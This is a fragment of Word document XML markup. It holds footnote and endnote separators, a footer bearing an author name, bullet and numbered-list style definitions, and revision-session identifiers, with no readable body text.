  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="78654313" w14:textId="77777777" w:rsidR="00424133" w:rsidRDefault="00424133"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6788B7E9" w:rsidR="003C1D22" w:rsidRPr="003C1D22" w:rsidRDefault="00207EDF">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:rPr>
        <w:lang w:val="en-CA"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:lang w:val="en-CA"/>
      </w:rPr>
      <w:t>Ashish Kishor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1A0C4" w14:textId="77777777" w:rsidR="00424133" w:rsidRDefault="00424133" w:rsidP="003C1D22">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7D75DB5B" w14:textId="77777777" w:rsidR="00424133" w:rsidRDefault="00424133"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F8D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9BFE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951202"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="44049FC6"/>
    <w:lvl w:ilvl="0" w:tplc="15C6CD5E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="1E9CAD44">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="B9964522">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="7E0883A4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="93907560">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="610EAF24">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="658059E6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="537C19EC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="FAF4268A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1E4183B9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="040A722C"/>
    <w:lvl w:ilvl="0" w:tplc="9E72E1F8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="69AED946">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="D264D0C4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="9ABE08D0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="5C5CBAB8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C64E1086">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="2E9EAF7C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="B986D4A8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E0E65382">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1E496C51"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C09A6014"/>
    <w:lvl w:ilvl="0" w:tplc="4D3A158E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="2BC44E96">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="597A2024">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="8258EBDA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="C212D8B2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="AD32C648">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="5FBC1EA6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="3EFE078A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="BBDA3DC0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4"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4BF851"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B7D2A47A"/>
    <w:lvl w:ilvl="0" w:tplc="65F6F86E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="16DA2F20">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="3232EFE2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="77FA0D42">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="E49E38E4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="DCCC30A0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="EE70D4E8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="7256B9C6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="96D4BA98">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="51CD37B9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="78FCDC8A"/>
    <w:lvl w:ilvl="0" w:tplc="519EA1E8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="C01CA372">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="B66AB56E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="B41E6AE2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="E56E5046">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="208E3728">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="5EB6C384">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="0FD245BE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="DB9C7758">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="61CB7E46"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="443AB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03F34F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="670A711E"/>
    <w:lvl w:ilvl="0" w:tplc="FBA0F2F2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="F1CE0F96">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="74B8355C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="5396026E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="B6849CFA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="CA407136">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="A4FE2B0A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="8582316E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="BBA069FE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1317954275">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="659428319">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1133979975">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1875537800">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="564412484">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="850485199">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2006393143">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1519662352">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1346057132">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1218781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118F8"/>
    <w:rsid w:val="00013CF5"/>
    <w:rsid w:val="000255E4"/>
    <w:rsid w:val="00033640"/>
    <w:rsid w:val="00033BA9"/>
    <w:rsid w:val="00033FCC"/>
    <w:rsid w:val="00035D40"/>
    <w:rsid w:val="000365BD"/>
    <w:rsid w:val="00042AD8"/>
    <w:rsid w:val="00061196"/>
    <w:rsid w:val="0006329C"/>
    <w:rsid w:val="0006477D"/>
    <w:rsid w:val="000678C3"/>
    <w:rsid w:val="00070044"/>
    <w:rsid w:val="000A2651"/>
    <w:rsid w:val="000C324A"/>
    <w:rsid w:val="000D2815"/>
    <w:rsid w:val="000F01D0"/>
    <w:rsid w:val="001143BF"/>
    <w:rsid w:val="00116110"/>
    <w:rsid w:val="00121486"/>
    <w:rsid w:val="00123DCA"/>
    <w:rsid w:val="0012663A"/>
    <w:rsid w:val="001334A6"/>
    <w:rsid w:val="001435BC"/>
    <w:rsid w:val="00163836"/>
    <w:rsid w:val="00193DFF"/>
    <w:rsid w:val="001B53F2"/>
    <w:rsid w:val="001D17C4"/>
    <w:rsid w:val="001F288C"/>
    <w:rsid w:val="001F4D68"/>
    <w:rsid w:val="001F5071"/>
    <w:rsid w:val="001F53AA"/>
    <w:rsid w:val="00207EDF"/>
    <w:rsid w:val="002200E0"/>
    <w:rsid w:val="00236359"/>
    <w:rsid w:val="0023755D"/>
    <w:rsid w:val="00261136"/>
    <w:rsid w:val="0027141C"/>
    <w:rsid w:val="002A3971"/>
    <w:rsid w:val="002A6FAF"/>
    <w:rsid w:val="002B1881"/>
    <w:rsid w:val="002C5D1F"/>
    <w:rsid w:val="002C5E08"/>
    <w:rsid w:val="002D4156"/>
    <w:rsid w:val="002F632A"/>
    <w:rsid w:val="002F707C"/>
    <w:rsid w:val="002F7B02"/>
    <w:rsid w:val="0030270A"/>
    <w:rsid w:val="00317BD5"/>
    <w:rsid w:val="003344AB"/>
    <w:rsid w:val="00336E21"/>
    <w:rsid w:val="00346C3A"/>
    <w:rsid w:val="00350DAB"/>
    <w:rsid w:val="00357DC3"/>
    <w:rsid w:val="003618FE"/>
    <w:rsid w:val="00362398"/>
    <w:rsid w:val="00372ACF"/>
    <w:rsid w:val="00386BB0"/>
    <w:rsid w:val="003931C8"/>
    <w:rsid w:val="00397858"/>
    <w:rsid w:val="003A260D"/>
    <w:rsid w:val="003B4C42"/>
    <w:rsid w:val="003B694C"/>
    <w:rsid w:val="003C1D22"/>
    <w:rsid w:val="003C2B45"/>
    <w:rsid w:val="003D2C2E"/>
    <w:rsid w:val="003D482D"/>
    <w:rsid w:val="003F1837"/>
    <w:rsid w:val="003F74B4"/>
    <w:rsid w:val="00424133"/>
    <w:rsid w:val="00433937"/>
    <w:rsid w:val="00473F8C"/>
    <w:rsid w:val="00487307"/>
    <w:rsid w:val="00497A8C"/>
    <w:rsid w:val="004F3AA4"/>
    <w:rsid w:val="00510D8F"/>
    <w:rsid w:val="00513E5F"/>
    <w:rsid w:val="00542F3A"/>
    <w:rsid w:val="00550781"/>
    <w:rsid w:val="00552215"/>
    <w:rsid w:val="00556153"/>
    <w:rsid w:val="0056068A"/>
    <w:rsid w:val="00566EE3"/>
    <w:rsid w:val="00574516"/>
    <w:rsid w:val="00584B92"/>
    <w:rsid w:val="00585193"/>
    <w:rsid w:val="00585946"/>
    <w:rsid w:val="00596405"/>
    <w:rsid w:val="005A5CEF"/>
    <w:rsid w:val="005B67FC"/>
    <w:rsid w:val="005D4EB6"/>
    <w:rsid w:val="005E05E5"/>
    <w:rsid w:val="005F5ACF"/>
    <w:rsid w:val="005F68CD"/>
    <w:rsid w:val="00603428"/>
    <w:rsid w:val="006219D7"/>
    <w:rsid w:val="00621B3F"/>
    <w:rsid w:val="006253D6"/>
    <w:rsid w:val="00626011"/>
    <w:rsid w:val="00626CF5"/>
    <w:rsid w:val="0063180D"/>
    <w:rsid w:val="006534BB"/>
    <w:rsid w:val="006614E2"/>
    <w:rsid w:val="006626E8"/>
    <w:rsid w:val="00664DF6"/>
    <w:rsid w:val="006A02FE"/>
    <w:rsid w:val="006A5F39"/>
    <w:rsid w:val="006B296D"/>
    <w:rsid w:val="006D7354"/>
    <w:rsid w:val="0070336B"/>
    <w:rsid w:val="0070674A"/>
    <w:rsid w:val="0071459E"/>
    <w:rsid w:val="0071773C"/>
    <w:rsid w:val="007206D5"/>
    <w:rsid w:val="007221D3"/>
    <w:rsid w:val="00725C99"/>
    <w:rsid w:val="007356F4"/>
    <w:rsid w:val="00737C68"/>
    <w:rsid w:val="00750037"/>
    <w:rsid w:val="00763272"/>
    <w:rsid w:val="007778AB"/>
    <w:rsid w:val="00782E20"/>
    <w:rsid w:val="00794845"/>
    <w:rsid w:val="007A0709"/>
    <w:rsid w:val="007A3BB1"/>
    <w:rsid w:val="007B19D9"/>
    <w:rsid w:val="007C7745"/>
    <w:rsid w:val="008110E6"/>
    <w:rsid w:val="00842F5A"/>
    <w:rsid w:val="00887CD1"/>
    <w:rsid w:val="008B6477"/>
